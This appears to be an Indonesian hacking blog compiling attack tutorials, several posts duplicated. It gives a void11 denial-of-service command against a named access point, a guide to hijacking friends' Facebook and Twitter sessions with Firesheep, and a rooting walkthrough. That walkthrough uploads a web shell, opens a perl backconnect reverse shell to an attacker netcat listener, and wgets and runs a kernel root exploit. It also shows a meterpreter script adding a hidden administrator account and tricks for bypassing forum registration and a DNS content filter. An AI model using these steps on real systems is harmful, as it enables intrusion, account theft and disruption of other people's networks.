iwpriv wlan0 hostapd 1
./void11_hopper
alternatif void_hopper mode juga bisa meprgunakan :
iwconfig wlan0 channel 6 (set card to channel 6)
Penggunaan :
void11_penetration [interface] -D -s [type of attack] -s [station MAC] -S [SSID] -B [BSSID]
Penyerangan :
Misalkan saja kita ingin melakukan penyerangan terhadap sebuah AP, maka saya awali dulu dengan melakukan wardriving...biasanya saya mepergunakan kismet.
Dari hasil wardriving saya mendapatkan :
SSID : linksys
mAC : 00:06:BF:64:AB:35
Siapakan penyerangan sbb :
void11_penetration wlan0 -D -t 1 -S linksys -B 00:06:BF:64:AB:35
tewas tu AP , harus di restart, lebih serem dari pada serangan deuth
teknik forensic, menggali data pada sebuah poto dengan exiftool (backtrack 4 R1)
Dengan menggunakan linux yg emang di buat khusus untuk hacking dan forensic kaka sekalian juga bisa , yaitu menggunakan exiftool yg sudah ada di abcktrack 4 R1
dengan aplikasi ini anda bisa ngecek keaslian poto dengan metode mengextrack semua adata yg ada pada poto, sebagai contoh saya pernah mentes nya dengan poto penampakan ehhh ternyata hasil nya poto tersebut di ediit dengan coralldraw wkwkwkwk
data yg di extrak oleh aplikasi tersebuat adalah :
-diskripsi tentang gmbar
-aplikasi yg di gunakan
-alat yg di gunakan untuk mengambil poto
-resolusi poto
-TGL dan tahun kapan di buat poto nya
-iso
-orientasi poto
-meterring mode
-brieetnes
-camera model name
-DLL
cara menggunain tu aplikasi :
buka terminal, ketik
/pentest/misc/exiftool/ directory
contoh :
/pentest/misc/exiftool/# ./image t/images/penampakan.jpg
ni poto nya pas saya ngetes ke akuratan aplikasi nya
http://www.facebook.com/photo.php?fbid=1613621457619&set=a.1402334095567.2051764.1148769828
Masuk Forum tanpa registrasi
cara ngeliat forum atau website dengan googlebot (ngeliat tanpa perlu regis) for firefox (ff)
1.step ketikan ini di kolom alamat situs firefox
Code:
about : config
klo sudah entar ada peringatan gak papa masuk aja terus >> entar kalian akan liat string register buat setingan firefox
2. masukan string ini di setingan register ff (bikin string baru dengan format text)
Code:
general.useragent.extra.firefox
maka akan muncul defaultnya >> firefox/3.0.10 <<>
Code:
Googlebot/2.X (http://www.googlebot.com/bot.html)
3. restart ff klo bener kalian bisa liat beberapa web atau forum yg kudu regis tanpa perlu regis (di status user akan terlihat ada googlebot <<>
sebenernya neh trik lama tapi masih lumayan juga lo
nb: klo cara ini jalan lo bakalan susah regis di forum yg isa di tembus (soalnya kolom regisnya ilang) untuk beberapa forum dah gak isa pake cara ini soalnya dah make script baru atau di blok oleh adminnya
ADD-ON firefox untuk membajak akun FB dan twit di jaringan wifi
Firesheep, Sebuah add-on baru untuk Firefox diketahui memungkinkan siapa saja memindai jaringan WiFi dan membajak akses orang lain di Facebook, Twitter, Flickr, Tumblr, Yelp dan layanan jejaring sosial lainnya.
Ketika kita akan login ke website dengan memasukkan username dan password ke website tersebut kemudian website tersebut akan memeriksa apakah informasi yang kita berikan cocok dan jika ia, maka website akan mengirimkan informasi berupa “cookie” yang digunakan oleh browser untuk melakukan permintaan berikutnya.
Biasanya disitus tertentu saja yang memaksi proses enkripsi pada saat kita login, sedangkan di facebook atau layanan jejaring sosial lainnya tidak, dan ini meninggalkan “cookie” yang beseliweran di udara ( pada jaringan wifi yang tidak terproteksi oleh password ), dan pengguna ( mungkin teman kita ) rentan terhadap pembajakan “cookie” yang kemudian dipakai untuk mencuri informasi login ke situs tadi.
add-on firerox Firesheep akan melakukan “HTTP sension hijacking” memakai media wifi yang tidak terproteksi oleh password, setelah add-on Firesheep terinstall di firefox, maka kita akan disodorkan dengan “sidebar” baru yang dimana kita bisa untuk memulai “menangkap” informasi “cookie” di udara. Setelah kita terhubung ke jaringan wireless yang tanpa password alias gratis tis…, klik tombol “Start Capturing” kemudian tunggu hasilnya.
Dan begitu teman kita berkunjung ke situs yang tidak aman yang dikenali oleh add-on firesheep ini, nama dan foto mereka akan di tampilkan
Kemudian yang akan kita lakukan, klik 2x pada login orang itu, dan otomatis kita akan masuk memakai login nya, selanjutnya terserah kita
Add-on Firesheep adalah gratis, open source, dan tersedia sekarang untuk Mac OS X dan Windows. Dukungan untuk Linux sedang dipersiapkan
dan tutor video nya
http://www.youtube.com/watch?v=aRRFpOcG8ss
Mendapatkan akses root traget
Apa sih tujuannya harus “ngeroot” atau mendapatkan akses root? Karena akses level “root” merupakan akses level tertinggi dalam UNIX, so dengan kita mendapatkan “root” maka anda bisa melakukan hal yang lebih banyak di server target.
Okelah klo begitu yuk kita mulai, beginilah cara ngeroot.
Langkah untuk ngeroot adalah:
1. Sediakan server / pc untuk menjalankan Netcat
2. Sediakan target yang sudah kita dapat dari (RFI/SHELLUPLOAD/LFI/DSB) yang safemode (OFF)
3. Sedikan juga shell injection tools (c99, r57, dsb) yang didalamnya tersedia fasilitas untuk backconnect / gunakan perl backconnect tools
4. Sediakan Netcat (NC) untuk menerima connection dari backconnect
5. Sediakan local root exploit yang sesuai dengan kernel target
Oke, kita mulai beraksi
Asumsikan bahwa:
IPHOSTSERVER ANDA = 100.100.100.100
PORT SERVER NETCAT ANDA: 10000
Langkah pertama cara ngeroot:
Pastikan bahwa Netcat sudah terinstall & Anda sudah menjalankan Netcat pada Server Anda.
Commandnya sangat sederhana: netcat -n -l -v -p PORT
Contoh: netcat -n -l -v -p 10000
binushacker@ourbox:~$ nc -n -l -v -p 10000
Listening on [any] 10000 …
Langkah kedua cara ngeroot:
Pastikan bahwa anda sudah melakukan upload c99 / r57 ke server dimana didalamnya terdapat fasilitas backconnect. Jadi kita tinggal masukkan IP server kita,
Jika anda menggunakan perl backconnect tools, anda cukup ketikkan perintah: perl backconnectortools.txt IPHOSTSEVERANDA PORT
Contoh:
perl backconnect.txt 100.100.100.100 10000
Langkah ketiga cara ngeroot:
Tunggulan sampai ada connection dari server target ke server anda, biasanya akan muncul pesan bahwa terdapat koneksi ke server anda dari target.
Contoh:
binushacker@ourbox:~$ nc -n -l -v -p 10000
Listening on [any] 10000 …
Connect to [195.13.10.210] from localhost [127.0.0.1] 10000
Linux www.target.com 2.6.16 #1 SMP Fri Jun 01 17:19:41 EST NEW 2007 i686 i686 i386 GNU/Linux
uid=48(apache) gid=48(apache) groups=48(apache)
Langkah ke-empat cara ngeroot:
Anda sudah terkoneksi ke target, disinilah anda harus pandai-pandai menggunakan command Unix. Anda bisa belajar lebih dahulu command” Unix server.
Apabila sudah terkoneksi, maka persiapkanlah LOCAL EXPLOIT UNTUK KERNEL SERVER, ada banyak tools untuk local disesuaikan dengan kebutuhan.
Karena kernel target adalah 2.6.16, maka kita akan menggunakan 2.6.16 -> raptor, raptor2, h0llyshit, prctl untuk exploitnya.
Informasi mengenai local exploit untuk masing” kernel bisa dicari google, kalau kata ulil gamal gunakan jari jemari anda untuk menemukannya :)
Oke kita lanjut, setelah itu kita wget file raptor, kita tempatkan di yang permissionnya bisa execute. Kita cari saja yang 777 (misal: /var/tmp).
Kemudian kita jalankan perintahnya: ./raptor
w00t: uid=0(root) gid=0(root) groups=0(root)
whoami
uid=0(root) gid=0(root) groups=0(root)
Simsalanim kaarbaarba hahaha..
selamat anda sudah mendapatkan root.
Video Tutorial: Hacking With Backtrack 4ideo Tutorial: Hacking With Backtrack 4
Tutorial nya make backtrack4,ukuran nya klo ga salah 6 GB++ kalo mw download silahkan aja.., yg penting kuat bandwitchna
Teknik2 yang dibahas dalam tutorial ini adalah sebagai berikut :
* Episode 1 – Network Hacking – Arp Poisoning
* Episode 2 – Wireless Hacking – Cracking WEP
* Episode 3 – Wireless Hacking – DeAuth
* Episode 5 – Lock Picking – Bump Key
* Episode 6 – Phone Phreaking – Beige Box
* Episode 7 – Phone Phreaking/Network Hacking – Sniffing VOIP
* Episode 8 – Lock Picking – DIY Padlock Shims
* Episode 9 – Lock Picking – Mult-Disc Combo Locks
* Episode 10 – Hacking Basics – MD5
* Episode 11 – Website Hacking – Sql Injection
* Episode 12 – Hacking Basics – Backtrack
* Episode 13 – Website Hacking – XSS
* Episode 14 – Staying Secure – SSH Tunnel
* Episode 15 – Modding – Xbox Softmod
* Episode 16 – Wireless Hacking – Cracking WPA
* Episode 17 – Triple Boot – Windows, Backtrack, & Ubuntu
* Episode 18 – Local Password Cracking
* Episode 19 – Lock Picking Basics
* Episode 20 – Ettercap
* Episode 21 – XSS Tunnel
* Episode 22 – Playstation 2 Softmod
* Episode 23 – Cracking WEP Update
* Episode 24 – Bypass Hotspot’s Access Controls
* Underground – Install Backtrack 3 on USB
* Underground – CSRF(Cross Site Request Forgery)
* Underground – Alternate Data Streams
* Underground – Local File Inclusion
* Underground – Windows Privilege Escalation
* Underground – Bluetooth Hacking
* Underground – VMWare
* Underground – Fix Google Mail Enumerator
* Underground – Home Made Lock Picks
* Underground – Downfalls of Anti-Virus Software Part 2
* Underground – Downfalls of Anti-Virus Software
* Underground – Evilgrade
* Underground – Trojan Basics
* Underground – Manipulating Windows User Accounts
* Underground – Combine Files
* Underground – Password Phishing
* Underground – Windows SMB Relay Exploit
* Underground – Application Patching
* Underground – Metasploit Autopwn
* Underground – Email Spoofing
* Underground – Introduction
* Extracting Database Information from Information_Schema
* FPGA MD5 Cracker
* Arduino ARP Cop
* Email Injection
* Ping of Death
* DNS Spoofing with Virtual Hosts
* Bypass Cisco Clean Access & Cisco NAC Appliance
* Dual Boot – Windows & Backtrack
* Sql Injection Challenge How-to
* How to use Intel Pro/Wireless 3945ABG in Backtrack 2
* Local Privilege Escalation Vulnerability in Cisco VPN Client
nah, buat teman2 yang siap mengunduh video tutorial berkapasitas besar ini silahkan anda mendowloadnya di sini,,, hehe yg sabar ya, soalnya di bagi 33 part.
* http://hotfile.com/dl/25115438/d19f10f/bt.DVD.part01.rar.html
* http://hotfile.com/dl/25115968/18fa8e5/bt.DVD.part02.rar.html
* http://hotfile.com/dl/25116314/b963c46/bt.DVD.part03.rar.html
* http://hotfile.com/dl/25116591/fab11bb/bt.DVD.part04.rar.html
* http://hotfile.com/dl/25116915/2882182/bt.DVD.part05.rar.html
* http://hotfile.com/dl/25117144/6f25cef/bt.DVD.part06.rar.html
* http://hotfile.com/dl/25117442/205cd46/bt.DVD.part07.rar.html
* http://hotfile.com/dl/25117654/12cb72b/bt.DVD.part08.rar.html
* http://hotfile.com/dl/25117920/2b12f8b/bt.DVD.part09.rar.html
* http://hotfile.com/dl/25118192/276ee91/bt.DVD.part10.rar.html
* http://hotfile.com/dl/25118474/0a1c516/bt.DVD.part11.rar.html
* http://hotfile.com/dl/25118886/dac42cc/bt.DVD.part12.rar.html
* http://hotfile.com/dl/25119320/9a494df/bt.DVD.part13.rar.html
* http://hotfile.com/dl/25124466/f426200/bt.DVD.part14.rar.html
* http://hotfile.com/dl/25125403/c4bd091/bt.DVD.part15.rar.html
* http://hotfile.com/dl/25126157/7c34a43/bt.DVD.part16.rar.html
* http://hotfile.com/dl/25126892/6b2b305/bt.DVD.part17.rar.html
* http://hotfile.com/dl/25127791/d516701/bt.DVD.part18.rar.html
* http://hotfile.com/dl/25128566/e155665/bt.DVD.part19.rar.html
* http://hotfile.com/dl/25129145/24ea2b2/bt.DVD.part20.rar.html
* http://hotfile.com/dl/25129668/ce706b8/bt.DVD.part21.rar.html
* http://hotfile.com/dl/25130322/08fa8bb/bt.DVD.part22.rar.html
* http://hotfile.com/dl/25130962/8c4d9a7/bt.DVD.part23.rar.html
* http://hotfile.com/dl/25131616/28a9ef2/bt.DVD.part24.rar.html
* http://hotfile.com/dl/25132156/c3fb6cc/bt.DVD.part25.rar.html
* http://hotfile.com/dl/25132903/d6d8232/bt.DVD.part26.rar.html
* http://hotfile.com/dl/25133491/8dd5f2c/bt.DVD.part27.rar.html
* http://hotfile.com/dl/25134062/365b929/bt.DVD.part28.rar.html
* http://hotfile.com/dl/25134551/d52aa9a/bt.DVD.part29.rar.html
* http://hotfile.com/dl/25135308/3aa5284/bt.DVD.part30.rar.html
* http://hotfile.com/dl/25135898/135bc05/bt.DVD.part31.rar.html
* http://hotfile.com/dl/25136466/9f68bbc/bt.DVD.part32.rar.html
* http://hotfile.com/dl/25136722/1492995/bt.DVD.part33.rar.html
Armitage - GUI Manajemen Attack Untuk Metasploit (backtrack4 R1)
Armitage adalah sebuah Tools Grafis (Windows & Linux) untuk manajemen serangan yang digunakan pada Metasploit yang mampu memvisualisasikan target anda, merekomendasikan eksploitasi, dan memperlihatkan kemampuan canggih melalu sebuah skema. Armitage bertujuan untuk membuat Metasploit dapat digunakan untuk praktisi keamanan yang mengerti hacking. Jika Anda ingin belajar Metasploit dan melihat fitur-fitur canggih yang disiapkan, Armitage bisa jadi solusi anda.
Armitage mengatur kemampuan Metasploit saat proses hacking. Terdapat fitur untuk Discovery, akses, Post-exploitation, dan penetrasi/Manuver.
Untuk penemuan, Armitage mengekspos beberapa fitur manajemen host Metasploit. Anda dapat mengimpor host dan menjalankan scan pada database sasaran. Armitage juga memvisualisasikan database target sehingga anda akan selalu tahu mana host Anda bekerja dan di mana Anda memiliki session.
rmitage membantu dengan Remote Exploitation - menyediakan fitur untuk secara otomatis merekomendasikan eksploitasi yang akan digunakan dan bahkan menjalankan check aktif sehingga Anda tahu mana eksploitasi yang akan bekerja. Jika pilihan ini gagal, Anda dapat menggunakan pendekatan Hail Mary approach dan melepaskan db_autopwn terhadap database target Anda.
Armitage memaparkan fitur klien-sisi Metasploit. Anda dapat memulai browser exploits, menghasilkan malicous file, dan membuat executable meterpreter.
Setelah Anda masuk, Armitage menyediakan beberapa tools yang dibangun pasca-eksploitasi dengan kemampuan dari meterpreter agent. Dengan klik menu Anda akan memperoleh keistimewaan berupa, dump hash password untuk local credentials database, Browse file, dan meluncurkan Command Shell.
ang terkahir, Armitage membantu proses pengaturan pivoting, yaitu sebuah kemampuan yang memungkinkan Anda menggunakan compromised host sebagai platform untuk menyerang host lain dan menyelidiki lebih lanjut jaringan target dengan kata lain Metasploit bisa meluncurkan serangan dari host yg dikompromikan dan menerima sesi pada host yang sama. Selain itu Armitage juga mengekspos modul SOCKS proxy Metasploit, yang memungkinkan tools eksternal untuk mengambil keuntungan dari pivoting. Dengan tools ini, Anda dapat lebih mengeksplorasi dan melakukan penetrasi maksimal melalui jaringan.
bila anda bukan pengguna backtrack4 R1 bisa menginstall Armirage
Untuk menggunakan Armitage, Anda memerlukan berikut ini:
* Linux atau Windows
* Java 1.6
* Metasploit Framework 3.5
* Database dikonfigurasi.
Pastikan Anda tahu username, password, dan host.
contoh screenshoot armitage di backtrack4
http://www.facebook.com/photo.php?fbid=1630231272854&set=a.1402334095567.2051764.1148769828
http://www.facebook.com/photo.php?fbid=1630231312855&set=a.1402334095567.2051764.1148769828
http://www.facebook.com/photo.php?fbid=1630230152826&set=a.1402334095567.2051764.1148769828
http://www.facebook.com/photo.php?fbid=1630230192827&set=a.1402334095567.2051764.1148769828
bagi pengguna windows dan linux distro lainbisa download di
windows
http://www.fastandeasyhacking.com/download/armitage112510.zip
linux
http://www.fastandeasyhacking.com/download/armitage112510.zip
Armitage mengatur kemampuan Metasploit saat proses hacking. Terdapat fitur untuk Discovery, akses, Post-exploitation, dan penetrasi/Manuver.
Untuk penemuan, Armitage mengekspos beberapa fitur manajemen host Metasploit. Anda dapat mengimpor host dan menjalankan scan pada database sasaran. Armitage juga memvisualisasikan database target sehingga anda akan selalu tahu mana host Anda bekerja dan di mana Anda memiliki session.
rmitage membantu dengan Remote Exploitation - menyediakan fitur untuk secara otomatis merekomendasikan eksploitasi yang akan digunakan dan bahkan menjalankan check aktif sehingga Anda tahu mana eksploitasi yang akan bekerja. Jika pilihan ini gagal, Anda dapat menggunakan pendekatan Hail Mary approach dan melepaskan db_autopwn terhadap database target Anda.
Armitage memaparkan fitur klien-sisi Metasploit. Anda dapat memulai browser exploits, menghasilkan malicous file, dan membuat executable meterpreter.
Setelah Anda masuk, Armitage menyediakan beberapa tools yang dibangun pasca-eksploitasi dengan kemampuan dari meterpreter agent. Dengan klik menu Anda akan memperoleh keistimewaan berupa, dump hash password untuk local credentials database, Browse file, dan meluncurkan Command Shell.
ang terkahir, Armitage membantu proses pengaturan pivoting, yaitu sebuah kemampuan yang memungkinkan Anda menggunakan compromised host sebagai platform untuk menyerang host lain dan menyelidiki lebih lanjut jaringan target dengan kata lain Metasploit bisa meluncurkan serangan dari host yg dikompromikan dan menerima sesi pada host yang sama. Selain itu Armitage juga mengekspos modul SOCKS proxy Metasploit, yang memungkinkan tools eksternal untuk mengambil keuntungan dari pivoting. Dengan tools ini, Anda dapat lebih mengeksplorasi dan melakukan penetrasi maksimal melalui jaringan.
bila anda bukan pengguna backtrack4 R1 bisa menginstall Armirage
Untuk menggunakan Armitage, Anda memerlukan berikut ini:
* Linux atau Windows
* Java 1.6
* Metasploit Framework 3.5
* Database dikonfigurasi.
Pastikan Anda tahu username, password, dan host.
contoh screenshoot armitage di backtrack4
http://www.facebook.com/photo.php?fbid=1630231272854&set=a.1402334095567.2051764.1148769828
http://www.facebook.com/photo.php?fbid=1630231312855&set=a.1402334095567.2051764.1148769828
http://www.facebook.com/photo.php?fbid=1630230152826&set=a.1402334095567.2051764.1148769828
http://www.facebook.com/photo.php?fbid=1630230192827&set=a.1402334095567.2051764.1148769828
bagi pengguna windows dan linux distro lainbisa download di
windows
http://www.fastandeasyhacking.com/download/armitage112510.zip
linux
http://www.fastandeasyhacking.com/download/armitage112510.zip
Aplikasi ngeremote destop/komputer di backtrack
Aplikasi : rdesktop
buka console
-rdesktop 192.168.100.1
harus tau password soal nya legal nge remote nya
klo di metasploit
meterpreter > run getgui -u hax0r -p gibs0n
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is disabled enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] Setting user account for logon
[*] Adding User: hax0r with Password: gibs0n
[*] Adding User: hax0r to local group Remote Desktop Users
[*] Adding User: hax0r to local group Administrators
[*] You can now login with the created user
meterpreter >
-u =usermane
-p =password
DO the best..
buka console
-rdesktop 192.168.100.1
harus tau password soal nya legal nge remote nya
klo di metasploit
meterpreter > run getgui -u hax0r -p gibs0n
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is disabled enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] Setting user account for logon
[*] Adding User: hax0r with Password: gibs0n
[*] Adding User: hax0r to local group Remote Desktop Users
[*] Adding User: hax0r to local group Administrators
[*] You can now login with the created user
meterpreter >
-u =usermane
-p =password
DO the best..
Menembus Proteksi Nawala Project
Nawala Project adalah sebuah proteksi DNS Filtering yang melindungi koneksi internet anda dari hal-hal yang berbau pornografi, perjudian, phising, malware, atau apapun yang berbahaya bagi anak anda (Itu kata yang promosi).
Proteksi dari Nawala Project sering digunakan di warnet-warnet yang terutama di daerah saya, karena cara memasang proteksinya yang gampang.
Biasanya kaum muda yang pengen melihat situs yang berbau porno akan terkejut begitu melihat situs yang diinginkan tidak bisa dibuka. hahahaha apes.
Karena begitu mudahnya memasang proteksi ini, cara untuk menembus proteksinya pun juga sangat mudah, tidak perlu software, tidak perlu pistol untuk menodong yang punya warnet untuk membuka proteksi, tidak perlu peralatan yang aneh aneh.
Berikut adalah persyaratan yang diperlukan untuk menembusnya.
1. Anda harus bisa membaca dan menulis
2. Anda harus bisa mengoperasikan komputer
3. Anda harus menyiapkan Nomor DNS server yang tidak ada proteksinya sama sekali.
Cara Menembus Proteksi Nawala Project
Untuk syarat nomer 3 anda hanya tinggal mengganti kedua nomor DNS Server komputer warnet anda dengan nomor DNS server di bawah ini.
208.67.222.222 untuk preferred DNS server
208.67.220.220 Untuk Alternate DNS Server
Sebenarnya masih banyak server lain, tapi kalau tidak mau repot ya pakai yang sudah saya berikan saja, aman kok.
setelah kedua nomor itu anda ganti tinggal ok dan apply.
Proteksi Nawala Project berhasil anda tembus.
Semoga berhasil.
Proteksi dari Nawala Project sering digunakan di warnet-warnet yang terutama di daerah saya, karena cara memasang proteksinya yang gampang.
Biasanya kaum muda yang pengen melihat situs yang berbau porno akan terkejut begitu melihat situs yang diinginkan tidak bisa dibuka. hahahaha apes.
Karena begitu mudahnya memasang proteksi ini, cara untuk menembus proteksinya pun juga sangat mudah, tidak perlu software, tidak perlu pistol untuk menodong yang punya warnet untuk membuka proteksi, tidak perlu peralatan yang aneh aneh.
Berikut adalah persyaratan yang diperlukan untuk menembusnya.
1. Anda harus bisa membaca dan menulis
2. Anda harus bisa mengoperasikan komputer
3. Anda harus menyiapkan Nomor DNS server yang tidak ada proteksinya sama sekali.
Cara Menembus Proteksi Nawala Project
Untuk syarat nomer 3 anda hanya tinggal mengganti kedua nomor DNS Server komputer warnet anda dengan nomor DNS server di bawah ini.
208.67.222.222 untuk preferred DNS server
208.67.220.220 Untuk Alternate DNS Server
Sebenarnya masih banyak server lain, tapi kalau tidak mau repot ya pakai yang sudah saya berikan saja, aman kok.
setelah kedua nomor itu anda ganti tinggal ok dan apply.
Proteksi Nawala Project berhasil anda tembus.
Semoga berhasil.
Langganan:
Postingan (Atom)